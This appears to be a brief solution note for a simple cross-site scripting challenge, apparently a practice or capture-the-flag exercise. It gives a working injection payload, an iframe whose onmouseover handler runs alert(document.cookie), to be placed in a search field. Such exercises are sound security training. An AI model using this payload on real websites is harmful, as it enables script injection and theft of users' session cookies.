This is one of the simplest XSS challenge.

Insert <iframe src="" onmouseover="alert(document.cookie)"> in the search field.